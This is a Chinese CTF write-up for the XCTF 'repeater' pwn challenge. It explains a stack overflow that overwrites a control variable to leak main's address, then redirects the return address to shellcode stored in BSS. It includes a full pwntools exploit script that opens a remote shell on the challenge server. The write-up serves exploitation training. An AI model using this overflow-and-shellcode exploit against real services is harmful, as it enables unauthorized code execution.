攻防世界 repeater 题解

攻防世界 repeater 题解

查看程序保护情况，开启了PIE，没开NX，RELRO全开。

在ida64中打开分析程序，这道题程序比较简单。可以发现的信息如下：

• 字符数组s大小为0x20，但可以读入0x40的长度，起始于rbp-30h处（见红框）

• 变量v5可以控制循环、条件控制输出main函数地址，该变量位于rbp-20h字符数组s空间后（见粉框）

• 通过字符串s溢出可控制变量v5的值及函数返回地址

• 程序运行起始可输入数据到内存BSS段（见蓝框）

根据这些信息，这道题的思路就出来了：

1. 程序起始运行，提示输入name时，输入一段shellcode（将存储到byte_202040处）

2. 通过字符串s溢出控制变量v5的值为3281697，从而泄露出main函数地址

3. 通过main函数地址及byte_202040与main地址偏移，获得shellcode代码地址

4. 构造溢出输入，覆盖返回地址，使程序跳转到shellcode执行，获得系统shell

这道题还是非常简单的，只是我在做的时候shellcode没选对，导致一直没利用成功（忘记改arch值）。

下面是这道题的完整代码：

from pwn import * 

sh = remote('61.147.171.105',50187)

# 通过输入name向BSS段写入shellcode
context.arch = 'amd64'
shellcode = asm(shellcraft.sh())
sh.sendlineafter('name :',shellcode)

# 通过输入内容溢出修改控制变量值，泄露main地址
num = 3281697
payload = b'A'*0x20 + p64(num)
sh.sendlineafter('input :',payload)
sh.recvuntil('you :\n0x')
main_addr = int(sh.recv(12),16)

# 再次通过输入内容溢出，将函数返回地址改为shellcode地址
shellcode_addr = main_addr + 0x202040 - 0xa33
payload2 = b'A'*0x20 + p64(0x1) + b'B'*16 + p64(shellcode_addr)
sh.sendlineafter('input :',payload2)
sh.interactive()

执行结果如图：